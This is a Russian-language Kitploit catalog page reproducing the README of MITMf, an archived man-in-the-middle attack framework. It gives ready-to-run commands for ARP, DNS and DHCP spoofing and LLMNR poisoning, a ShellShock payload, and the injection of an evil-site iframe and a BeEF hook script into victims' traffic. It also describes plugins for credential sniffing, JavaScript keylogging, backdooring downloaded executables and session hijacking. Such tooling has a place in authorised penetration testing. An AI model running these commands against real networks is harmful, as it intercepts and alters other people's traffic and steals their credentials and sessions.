Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
MITMf — Фреймворк для атак Man-In-The-Middle | Kitploit
Инструменты/GitHubGitHub/byt3bl33d3r/mitmf
Сниффинг и анализ пакетовЭксплуатацияФишингВеб-безопасностьСетевая безопасностьТестирование на ПроникновениеКомандование и УправлениеСоциальная инженерияАутентификацияRed TeamingАнализ DNSArchived
3.6k1.0k118 лет назадПроверено Kitploit
GitHub
byt3bl33d3r/mitmf

MITMf

Фреймворк для атак Man-In-The-Middle

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Supported Python versions Latest Version Supported OS Code Climate Build Status Coverage Status

MITMf

Фреймворк для атак Man-In-The-Middle

Этот проект больше не обновляется. MITMf был написан для удовлетворения потребности в современном инструменте для атак типа «человек посередине». С тех пор появилось множество других инструментов, заполнивших эту нишу. Вам, вероятно, следует использовать Bettercap, так как он гораздо более функционален и лучше поддерживается.

Краткие руководства, примеры и новости разработчика: https://byt3bl33d3r.github.io

Этот инструмент основан на sergio-proxy и является попыткой возродить и обновить проект.

Свяжитесь со мной:

  • Twitter: @byt3bl33d3r
  • IRC на Freenode: #MITMf
  • Email: [email protected]

Перед отправкой вопросов, пожалуйста, прочитайте соответствующий раздел в вики.

Установка

Пожалуйста, обратитесь к вики за инструкциями по установке

Описание

MITMf предназначен для обеспечения единого решения для атак Man-In-The-Middle и сетевых атак, при этом обновляя и улучшая существующие методы и техники атак.

Изначально созданный для устранения серьёзных недостатков других инструментов (например, Ettercap, Mallory), он был почти полностью переписан с нуля, чтобы предоставить модульную и легко расширяемую среду, которую каждый может использовать для реализации собственных MITM-атак.

Возможности

  • Фреймворк включает встроенные серверы SMB, HTTP и DNS, которые могут контролироваться и использоваться различными плагинами. Он также содержит модифицированную версию прокси SSLStrip, поддерживающую модификацию HTTP и частичный обход HSTS.

  • Начиная с версии 0.9.8, MITMf поддерживает активную фильтрацию и модификацию пакетов (в основном то, что делали etterfilter, только лучше), позволяя пользователям изменять любой тип трафика или протокола.

  • Файл конфигурации можно редактировать на лету во время работы MITMf; изменения будут переданы по всему фреймворку: это позволяет настраивать параметры плагинов и серверов прямо во время атаки.

  • MITMf перехватывает учётные данные FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (все поддерживаемые протоколы, такие как HTTP, SMB, LDAP и т.д.) и Kerberos с помощью Net-Creds, который запускается при старте.

  • Интеграция Responder обеспечивает отравление LLMNR, NBT-NS и MDNS, а также поддержку подставного WPAD-сервера.

Активная фильтрация/модификация пакетов

Теперь вы можете изменять любой пакет/протокол, перехваченный MITMf, с помощью Scapy! (больше никаких etterfilter, ура!)

Например, вот крошечный глупый фильтр, который просто меняет IP-адрес назначения ICMP-пакетов:

root@kitploit:~
if packet.haslayer(ICMP):
	log.info('Got an ICMP packet!')
	packet.dst = '192.168.1.0'
  • Используйте переменную packet для доступа к пакету в формате, совместимом с Scapy.
  • Используйте переменную data для доступа к сырым данным пакета.

Чтобы использовать фильтр, достаточно выполнить: python mitmf.py -F ~/filter.py

Вероятно, вы захотите объединить это с плагином Spoof, чтобы действительно перехватывать пакеты от других ;)

Примечание: вы можете изменять фильтры на лету без перезапуска MITMf!

Примеры

Самый простой запуск: запускает HTTP-прокси, серверы SMB, DNS, HTTP и Net-Creds на интерфейсе enp3s0:

python mitmf.py -i enp3s0

Отравление ARP всей подсети с шлюзом 192.168.1.1 с помощью плагина Spoof:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

То же самое с добавлением подставного WPAD-сервера с помощью плагина Responder:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

Отравление ARP диапазона 192.168.1.16-45 и подсети 192.168.0.1/24 с шлюзом 192.168.1.1:

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1

Включение подмены DNS при отравлении ARP (домены для подмены берутся из конфигурационного файла):

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

Включение подмены LLMNR/NBTNS/MDNS:

python mitmf.py -i enp3s0 --responder --wredir --nbtns

Включение подмены DHCP (пул IP-адресов и подсеть берутся из конфигурационного файла):

python mitmf.py -i enp3s0 --spoof --dhcp

То же самое с полезной нагрузкой ShellShock, которая будет выполнена, если клиент окажется уязвимым:

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Внедрение HTML-IFrame с помощью плагина Inject:

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

Внедрение JS-скрипта:

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

Запуск captive-портала, перенаправляющего всё на http://SERVER/PATH:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH

Запуск captive-портала по адресу http://ваш-ip/portal.html с использованием страницы по умолчанию /portal.html (спасибо responder) и /CaptiveClient.exe (не включён) из папки config/captive:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive

То же, но с использованием имени хоста captive.portal вместо IP (требуется, чтобы captive.portal разрешался в ваш IP, например, через подмену DNS):

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns

Обслуживание captive-портала с дополнительным экземпляром SimpleHTTPServer, раздающим LOCALDIR по адресу http://IP:8080 (порт можно изменить в mitmf.config):

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR

То же, но с именем хоста:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns

И многое, многое другое!

Конечно, вы можете комбинировать практически любые плагины вместе (например, ARP-спуфинг + inject + Responder и т.д.).

Полный список доступных опций можно получить, выполнив python mitmf.py --help.

Текущие доступные плагины

  • HTA Drive-By : Внедряет поддельное уведомление об обновлении и предлагает клиентам скачать HTA-приложение.
  • SMBTrap : Эксплуатирует уязвимость 'SMB Trap' на подключённых клиентах.
  • ScreenShotter : Использует HTML5 Canvas для создания точного скриншота браузера клиента.
  • Responder : Отравляет LLMNR, NBT-NS, WPAD и MDNS.
  • SSLstrip+ : Частично обходит HSTS.
  • Spoof : Перенаправляет трафик с помощью ARP, ICMP, DHCP или DNS-спуфинга.
  • BeEFAutorun : Автоматически запускает модули BeEF в зависимости от ОС клиента или типа браузера.
  • AppCachePoison : Выполняет атаки отравления HTML5 App-Cache.
  • Ferret-NG : Прозрачно захватывает сессии клиентов.
  • BrowserProfiler : Пытается перечислить все плагины браузера подключённых клиентов.
  • FilePwn : Внедряет бэкдор в исполняемые файлы, передаваемые по HTTP, с помощью Backdoor Factory и BDFProxy.
  • Inject : Внедряет произвольное содержимое в HTML-контент.
  • BrowserSniper : Выполняет drive-by атаки на клиентов с устаревшими плагинами браузера.
  • JSkeylogger : Внедряет JavaScript-кейлоггер на веб-страницы клиента.
  • Replace : Заменяет произвольное содержимое в HTML-контенте.
  • SMBAuth : Вызывает попытки аутентификации с запросом-ответом SMB.
  • Upsidedownternet : Переворачивает изображения на 180 градусов.
  • Captive : Создаёт captive-портал, перенаправляя HTTP-запросы через 302.

Как пополнить мой запас чая и суши

BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU

ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee

LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr

Скачать инструмент